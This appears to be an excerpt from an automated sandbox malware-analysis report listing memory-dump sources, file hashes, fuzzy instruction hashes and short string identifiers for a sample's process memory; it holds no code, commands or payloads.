                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Reset < >
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1427096815.00007FF8880C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff8880c0000_SecuriteInfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: H
                                                                                                                                                                                • API String ID: 0-2852464175
                                                                                                                                                                                • Opcode ID: c076f8df8a2c5ffa4253d25ef488bc5e7c87abe41589df16d2476ae825677684
                                                                                                                                                                                • Instruction ID: 9994d09b8fbd4ce435c42658fc5206af19d1aa72c0cb80c7a2ea467f73f1173d
                                                                                                                                                                                • Opcode Fuzzy Hash: c076f8df8a2c5ffa4253d25ef488bc5e7c87abe41589df16d2476ae825677684
                                                                                                                                                                                • Instruction Fuzzy Hash: 5C31786288E3C25FC7035B749C664A57FB0AE47260B0E40DBD8C4CB4E3D61C699AC762
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1427096815.00007FF8880C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff8880c0000_SecuriteInfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1270d3e36d8c29ea479f1b245abc392411bd8c3b272e6aacb555fc0bd5e69550
                                                                                                                                                                                • Instruction ID: 710dbb813ff2db29ab43cc1b09d836b623e3b80b4e074a353914d3f976dceb12
                                                                                                                                                                                • Opcode Fuzzy Hash: 1270d3e36d8c29ea479f1b245abc392411bd8c3b272e6aacb555fc0bd5e69550
                                                                                                                                                                                • Instruction Fuzzy Hash: 20318121E0DAC94FEB85AB6858696B87BE2FF5A751F0800BBD44DC71D3DE289845C702
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1427096815.00007FF8880C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff8880c0000_SecuriteInfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a44d546267806414703de627c76f028197018c8657fe43f67700c1360cbc2235
                                                                                                                                                                                • Instruction ID: 96a80bde992013eeeb1efe0a2028e0ab6632b7f71a90b77008bed7a616733150
                                                                                                                                                                                • Opcode Fuzzy Hash: a44d546267806414703de627c76f028197018c8657fe43f67700c1360cbc2235
                                                                                                                                                                                • Instruction Fuzzy Hash: BB713D70A189098FEB98EF68D498BAD77E2FF54355F604269E41AD32D1CF38AC41CB44
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1427096815.00007FF8880C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff8880c0000_SecuriteInfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2841fc4908625d4854c6c1ad555d5c97704915f267bd99de283cdf3d0e318f7d
                                                                                                                                                                                • Instruction ID: 97150dd5cd2969e8ee5d91cbf823e8ef3d273adfd014150120147c629d74fb37
                                                                                                                                                                                • Opcode Fuzzy Hash: 2841fc4908625d4854c6c1ad555d5c97704915f267bd99de283cdf3d0e318f7d
                                                                                                                                                                                • Instruction Fuzzy Hash: 9121A431F1494D4FEB84FB6C88697B973E2FF99745B04007AD40DD3293DE28A8418741
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1427096815.00007FF8880C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff8880c0000_SecuriteInfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a10735657a93fb8f30492298c89819d34021d568103ec00bef7fb5d6528aa1ab
                                                                                                                                                                                • Instruction ID: 8fbf17b34ca0390e7fd3eac55bedccef768f39b3ecf0636f7834a2c904b78e51
                                                                                                                                                                                • Opcode Fuzzy Hash: a10735657a93fb8f30492298c89819d34021d568103ec00bef7fb5d6528aa1ab
                                                                                                                                                                                • Instruction Fuzzy Hash: 76014931A1DA994FD744EB78886167973D2FF89754F1406B9C549C72C2DE3CA842C782
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1427096815.00007FF8880C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff8880c0000_SecuriteInfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fb9911d3de636f577f599be20d6b807cbd9bf01c35655a71ae015b98a78c07c5
                                                                                                                                                                                • Instruction ID: ccc6f652949190b12e49964d0c63ff1e0159a413f5ede2ce5f55444c23887376
                                                                                                                                                                                • Opcode Fuzzy Hash: fb9911d3de636f577f599be20d6b807cbd9bf01c35655a71ae015b98a78c07c5
                                                                                                                                                                                • Instruction Fuzzy Hash: F9F0FF30B289194BDB54AB28985067E73E2FF89794F600539D90EC3384DE3CA842CBC2
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1427096815.00007FF8880C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff8880c0000_SecuriteInfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a09c528b338784784868b3b4762cd809b297d9d674225eaf227a4751e5cf7e6b
                                                                                                                                                                                • Instruction ID: be8bf794d54b89b847f07eb62eb8f023cb93d868c8c20f9cba6de249a807708c
                                                                                                                                                                                • Opcode Fuzzy Hash: a09c528b338784784868b3b4762cd809b297d9d674225eaf227a4751e5cf7e6b
                                                                                                                                                                                • Instruction Fuzzy Hash: D0F02830A5D6594BDB54AA7C98416BE73D2FF89754F200579D50DC3286CE3CA842C7C1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1427096815.00007FF8880C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff8880c0000_SecuriteInfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 43b2a0be691debb65faad18d9c398ee2a0b4299d292b341ab327746b3e9af911
                                                                                                                                                                                • Instruction ID: 234fd13722ad8e27efebcaeec0b16e3de07015850f99284a228e92bfe22943dd
                                                                                                                                                                                • Opcode Fuzzy Hash: 43b2a0be691debb65faad18d9c398ee2a0b4299d292b341ab327746b3e9af911
                                                                                                                                                                                • Instruction Fuzzy Hash: C8E08611F1C9090FF69866AC28652B963C2EB88750F514179E00DC36C7DE1D9C82D285
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1427096815.00007FF8880C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880C0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff8880c0000_SecuriteInfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (0#$8,#$H1#$P/#$k^]I$-#
                                                                                                                                                                                • API String ID: 0-2702928345
                                                                                                                                                                                • Opcode ID: cee0d7c5a55065d6554d7bb7278d0c76fbba1c93a1fab6de817c7ee06f47c809
                                                                                                                                                                                • Instruction ID: 777f2dfff88619080e0787a00615e56421ca25deaed1977f269d6c837cdb0fcf
                                                                                                                                                                                • Opcode Fuzzy Hash: cee0d7c5a55065d6554d7bb7278d0c76fbba1c93a1fab6de817c7ee06f47c809
                                                                                                                                                                                • Instruction Fuzzy Hash: 6541EAA3D0EAC28FE6564D6638071756AA2FF11F90F6880FFC04C470DBE965AA19D346
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: SAN_^
                                                                                                                                                                                • API String ID: 0-3629432999
                                                                                                                                                                                • Opcode ID: e3fa3350546a84eeb99500bbd03de5104b3e70bc47b7979e2d5d50569c103939
                                                                                                                                                                                • Instruction ID: 87b54649a1e425b27cee3798c39d93fbbbb829800e3e198028cca09d3d493993
                                                                                                                                                                                • Opcode Fuzzy Hash: e3fa3350546a84eeb99500bbd03de5104b3e70bc47b7979e2d5d50569c103939
                                                                                                                                                                                • Instruction Fuzzy Hash: 11328171B18A494BEB98EB6894657BDB7D2FF88780F544579E40EC32D3DE3CA8018742
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 072941c0659c534c625c0b4caa3707f0860a34c2cc791eb22fd8dcd44fc1708f
                                                                                                                                                                                • Instruction ID: d08446491169d3ef204b9620bc447ae4d85e9703185582a531243d4f93305b32
                                                                                                                                                                                • Opcode Fuzzy Hash: 072941c0659c534c625c0b4caa3707f0860a34c2cc791eb22fd8dcd44fc1708f
                                                                                                                                                                                • Instruction Fuzzy Hash: EFF19330908A4D8FEFA8DF28C8557E977E1FF55340F04426AE85DC7296DB38A945CB82
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c23c562f91b908368e53b9b654fba92662d850da0f6af36fe888b4b281c56d82
                                                                                                                                                                                • Instruction ID: 6ca7ef203978a15773562e35b1e9f3d07fda1d967d64d6b0397be08511b9b081
                                                                                                                                                                                • Opcode Fuzzy Hash: c23c562f91b908368e53b9b654fba92662d850da0f6af36fe888b4b281c56d82
                                                                                                                                                                                • Instruction Fuzzy Hash: 15E1B030908A4E8FEFA8DF28C8557E977E1FB54350F14436AD84DC7296DB78A845CB82
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 483b8a2ae917036d1b8a5468ac6f68a9f6eeaa7d3183138606f40ea29bf1fa6d
                                                                                                                                                                                • Instruction ID: d96a8e3581d338d106a139b68937dd4de56b584dc734a2d7b8b2b7d80f0ad703
                                                                                                                                                                                • Opcode Fuzzy Hash: 483b8a2ae917036d1b8a5468ac6f68a9f6eeaa7d3183138606f40ea29bf1fa6d
                                                                                                                                                                                • Instruction Fuzzy Hash: 45512320A0D6C50FD786ABB858642B5BFD1EF87256F0841FAE08DC71D3DE1C4846C346
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0?#
                                                                                                                                                                                • API String ID: 0-1350394706
                                                                                                                                                                                • Opcode ID: 24f5489a29ba046ea2336558bc87c82d917cbe3827138ab95bd733a0e68b500c
                                                                                                                                                                                • Instruction ID: 90e94199a6c889e5c981d41e89b9ffc319dba5b1fc6d51dcb16f01c0c7d03945
                                                                                                                                                                                • Opcode Fuzzy Hash: 24f5489a29ba046ea2336558bc87c82d917cbe3827138ab95bd733a0e68b500c
                                                                                                                                                                                • Instruction Fuzzy Hash: E861BF31A1CA484FDB98EB6898997B977E1FF58350F54417AE40ED32D2CE38AC41CB41
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: j#
                                                                                                                                                                                • API String ID: 0-1519211169
                                                                                                                                                                                • Opcode ID: 08eaf92f8bb21e708a8ca5a184ccaa269943e0bf9437e0d2cc896a21d8fb31cc
                                                                                                                                                                                • Instruction ID: 9a65dddfad6137b6e907be5a8a3efffd14749d74c98b1027d52fab7ba6cc2b28
                                                                                                                                                                                • Opcode Fuzzy Hash: 08eaf92f8bb21e708a8ca5a184ccaa269943e0bf9437e0d2cc896a21d8fb31cc
                                                                                                                                                                                • Instruction Fuzzy Hash: ACC17360B289494BEB54BBACD8657BDB3D2EF98780F540176E41DC72D7CE2C6C428742
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: j#
                                                                                                                                                                                • API String ID: 0-1519211169
                                                                                                                                                                                • Opcode ID: 01b1af5ef8d25855df777b95425849bfea018fd3e9c0fc08c0e451aa43679ac9
                                                                                                                                                                                • Instruction ID: 2ffc4e828363212961b11c3e2814458feaa8af509f0302dc4ae551fa4e1c0eaf
                                                                                                                                                                                • Opcode Fuzzy Hash: 01b1af5ef8d25855df777b95425849bfea018fd3e9c0fc08c0e451aa43679ac9
                                                                                                                                                                                • Instruction Fuzzy Hash: 61B18620B289194BEA94FBACD8667BDB2D2FF98780F540175E41DC72D7CD2CAC428742
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: j#
                                                                                                                                                                                • API String ID: 0-1519211169
                                                                                                                                                                                • Opcode ID: cfc10a78cfc706feae2294f99358e97b563e53058e137a85839048b920265e21
                                                                                                                                                                                • Instruction ID: 9696305aa9f167bce52f60258645734c4184fdeaa674fe7047f67ee8c743b7c4
                                                                                                                                                                                • Opcode Fuzzy Hash: cfc10a78cfc706feae2294f99358e97b563e53058e137a85839048b920265e21
                                                                                                                                                                                • Instruction Fuzzy Hash: 1FA15560B189094BFA54BBACD8567BDB2D2EF98740F644275E10DC72D7CD6CAC028793
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: j#
                                                                                                                                                                                • API String ID: 0-1519211169
                                                                                                                                                                                • Opcode ID: 2ee704b26327c2239307992b70d728208a30d428790116eaa435a724bab06122
                                                                                                                                                                                • Instruction ID: 518e497b4c883c0999a0d5493738a29bde6eb419d5df01f09917a3fe74761a44
                                                                                                                                                                                • Opcode Fuzzy Hash: 2ee704b26327c2239307992b70d728208a30d428790116eaa435a724bab06122
                                                                                                                                                                                • Instruction Fuzzy Hash: 35810671D0D68A4FEB69E77488552A97BA1FF46390F0403BAD04DC70D3DE2CA85AC792
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: |M_H
                                                                                                                                                                                • API String ID: 0-1036736146
                                                                                                                                                                                • Opcode ID: 7d99631b9f529fa0e4ebbdc26eadf09bcbe268efa03ca0e3dd6b244d6cf3187d
                                                                                                                                                                                • Instruction ID: 580f7ef8525e780eff395442f09029826e5dc07f1323b41e231c8fd95b1ee721
                                                                                                                                                                                • Opcode Fuzzy Hash: 7d99631b9f529fa0e4ebbdc26eadf09bcbe268efa03ca0e3dd6b244d6cf3187d
                                                                                                                                                                                • Instruction Fuzzy Hash: FF617D31A1891D4FEB98EB68D4997BDB2E2FF98350F544579D40ED32D2CE38AC428B41
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0?#
                                                                                                                                                                                • API String ID: 0-1350394706
                                                                                                                                                                                • Opcode ID: 396c213708a609ade2a66e4a170e7e3d4f914e4bed47421e7871acd172107917
                                                                                                                                                                                • Instruction ID: 7ca983698d20c2b1655e717c4bb55a7ca165f57c6701eb67bd523d2b5aa178f2
                                                                                                                                                                                • Opcode Fuzzy Hash: 396c213708a609ade2a66e4a170e7e3d4f914e4bed47421e7871acd172107917
                                                                                                                                                                                • Instruction Fuzzy Hash: F8518EB4A48A1D8FEFA8EF68D496AB977E1FF54311F00016ED00AC3692CB35E841CB41
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0?#
                                                                                                                                                                                • API String ID: 0-1350394706
                                                                                                                                                                                • Opcode ID: 257402da0f4d91b578b39b7af86a96416b700ba119061d0fac0a733f064e6686
                                                                                                                                                                                • Instruction ID: ea2b1a620e7cfe8b7229f4c0e608b12bafc92625e00f051aea88f34c02f0551e
                                                                                                                                                                                • Opcode Fuzzy Hash: 257402da0f4d91b578b39b7af86a96416b700ba119061d0fac0a733f064e6686
                                                                                                                                                                                • Instruction Fuzzy Hash: D4418EB4948A0D8FEFA8EF68D495AB977E1FF14311F00016ED00AD3692CB75E841CB41
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: j#
                                                                                                                                                                                • API String ID: 0-1519211169
                                                                                                                                                                                • Opcode ID: 54ced0f2950ad7286bc8af5b0b4707382ce2f6ad59e2043569e39140c98e3d40
                                                                                                                                                                                • Instruction ID: b1e862e88717786781b24b785d8884c280d83e0ab4e0ce90105a634cd2c04064
                                                                                                                                                                                • Opcode Fuzzy Hash: 54ced0f2950ad7286bc8af5b0b4707382ce2f6ad59e2043569e39140c98e3d40
                                                                                                                                                                                • Instruction Fuzzy Hash: 4D41E231D08A4A4FEB59AB3488462B577A1FF56354F4443BAD00AC34D3DF3CA85ACB85
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0E
                                                                                                                                                                                • API String ID: 0-3459609915
                                                                                                                                                                                • Opcode ID: 9705195458037c2386718d824cb3d4e50e8ed2bad5969c06180b1cd5d412c2cb
                                                                                                                                                                                • Instruction ID: a0c1e94ddf88e6b852a6ef92471700da6ac687926dbc1cb86f2d3fa5b5d90983
                                                                                                                                                                                • Opcode Fuzzy Hash: 9705195458037c2386718d824cb3d4e50e8ed2bad5969c06180b1cd5d412c2cb
                                                                                                                                                                                • Instruction Fuzzy Hash: 3B31B1B1A58A494FEB999F6894653B93BE2FF85350F9401B9E04EC32D7CE3C5802C706
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0E
                                                                                                                                                                                • API String ID: 0-3459609915
                                                                                                                                                                                • Opcode ID: 462a891e140a14d968d962b9d30040e7394127d79692926e229acff195675e6d
                                                                                                                                                                                • Instruction ID: c9310b044c3f84ec8fd401e5cfb599aeb35925db325fa1d3b03b4ba0927b809d
                                                                                                                                                                                • Opcode Fuzzy Hash: 462a891e140a14d968d962b9d30040e7394127d79692926e229acff195675e6d
                                                                                                                                                                                • Instruction Fuzzy Hash: F031A471E589094FEA98AF6894657B936E2FB88350F944179E00EC32D7CE3C6C02C745
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: d
                                                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                                                • Opcode ID: cd81c220f62d1ce969d184e35e186eb2aca35bc48bea3392d1d6215b2c5612a8
                                                                                                                                                                                • Instruction ID: ace49c5a1b6324b74d13ecbd56fedddd77a51e557b894d1063845b685466153e
                                                                                                                                                                                • Opcode Fuzzy Hash: cd81c220f62d1ce969d184e35e186eb2aca35bc48bea3392d1d6215b2c5612a8
                                                                                                                                                                                • Instruction Fuzzy Hash: CE218C31C082994AEF15ABA498062F97BE0FF05354F050276D85DD71C3DB3C6941CB96
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2844863617.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8880d0000_X.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: SAN_^
                                                                                                                                                                                • API String ID: 0-3629432999
                                                                                                                                                                                • Opcode ID: a4aaf95bb362fb08718bdfa6efb40660d00e17f4e93dfe6454d81b31678082dc
                                                                                                                                                                                • Instruction ID: b900be7c9cea34e3aa619f995a9f76cc395a20d081ec3b1acd234805a13225f2
                                                                                                                                                                                • Opcode Fuzzy Hash: a4aaf95bb362fb08718bdfa6efb40660d00e17f4e93dfe6454d81b31678082dc
                                                                                                                                                                                • Instruction Fuzzy Hash: 6A210721D0D2824EEF26A77448262B83F51BF52390F5906B9D04CCB1D3DF3D6842DB5A
                                                                                                                                                                                Uniqueness

